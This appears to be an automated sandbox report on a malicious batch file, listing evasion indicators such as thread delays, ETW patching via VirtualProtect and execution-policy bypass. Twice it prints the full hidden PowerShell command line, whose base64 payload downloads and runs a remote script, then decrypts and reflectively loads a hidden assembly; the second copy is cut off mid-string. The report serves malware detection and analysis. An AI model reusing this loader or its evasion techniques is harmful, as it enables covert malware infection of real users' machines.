                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 1433Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6695Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2951Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5393
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2679
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5009
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2968
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4706
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2258
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3688
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1096
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3835
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3888
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4366
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2159
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3878
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3799
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3147
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3586
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 8.4 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 5823 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep count: 3953 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6556Thread sleep count: 6695 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6556Thread sleep count: 2951 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6032Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1120Thread sleep count: 5393 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1512Thread sleep count: 2679 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1204Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1120Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep count: 5009 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep count: 2968 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3544Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4232Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep count: 4706 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep count: 2258 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224Thread sleep count: 3688 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224Thread sleep count: 1096 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep count: 3835 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5140Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2232Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1512Thread sleep count: 3888 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1528Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1512Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4448Thread sleep count: 4366 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3036Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2740Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4448Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep count: 2159 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep count: 3878 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3544Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep count: 4690 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 708Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep count: 3799 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2544Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep count: 3147 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 3586 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                Source: powershell.exe, 0000001A.00000002.1875426994.0000000007027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                Source: powershell.exe, 00000045.00000002.4133283092.0000000007793000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                Source: powershell.exe, 00000036.00000002.3038745207.0000000007C78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
                Source: powershell.exe, 0000000B.00000002.1571562839.0000000007ABD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1682233166.0000000003142000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2052352913.0000000007C42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2208552050.0000000007828000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2684912894.00000000078B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.3346739998.0000000007A59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3592406329.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: powershell.exe, 0000002B.00000002.2386464746.0000000006D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_15-34033
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00404734 LoadLibraryA,GetProcAddress,15_2_00404734
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 11.2.powershell.exe.6e3a3b0.1.raw.unpack, jgmgx.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
                Source: 11.2.powershell.exe.6e3a3b0.1.raw.unpack, jgmgx.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
                Source: 11.2.powershell.exe.6e3a3b0.1.raw.unpack, jgmgx.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                Bypasses PowerShell execution policy
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Maps a DLL or memory area into another process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\puDUCOeVK6.bat" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG